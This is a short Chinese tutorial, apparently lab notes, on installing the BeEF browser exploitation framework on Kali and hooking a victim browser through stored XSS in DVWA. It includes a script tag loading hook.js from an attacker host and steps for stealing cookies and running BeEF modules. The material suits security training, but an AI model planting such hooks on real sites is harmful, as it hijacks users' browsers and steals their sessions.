安装beef:apt install beef-xss
切换到beef目录(kali版本不同,beef配置文件位置不同):
cd /etc/beef-xss/config.yaml
或者
cd /usr/share/beef-xss/config.yaml
打开配置文件:
vim /etc/beef-xss/config.yaml /
vim /usr/share/beef-xss/config.yaml
修改密码和修改host值,改成kali的IP地址
启动beef:beef-xss/beef或者beef-xss
打开浏览器访问:http://192.168.128.128:3000/ui/panel
或者
http://192.168.128.128:3000/ui/authentication
让目标主机访问存在生成的钩子代码
<html>
<body>
123456
<script src="http://192.168.183.133:3000/hook.js"></script>
</body>
</html>
在DVWA中DVWA Security中把等级该为"low"然后选择XSS(Stroed)存储型XSS,上传脚本,并把长度改为1000,因为原来长度为50,写不下
获取控制权限
绿色模块:表示模块适用当前用户,并且执行结果对用户不可见
红色模块:表示模块不适用当前用户,有些红色模块也可以执行
橙色模块:模块可用,但结果对用户可见
灰色模块:模块为在目标浏览器上测试过
获取cookie
选择模块,进行攻击
可以选择"Brower"下面的"Hooked
Domain"的"create Alert Dialog(弹窗)",点击右下角的"execute"运行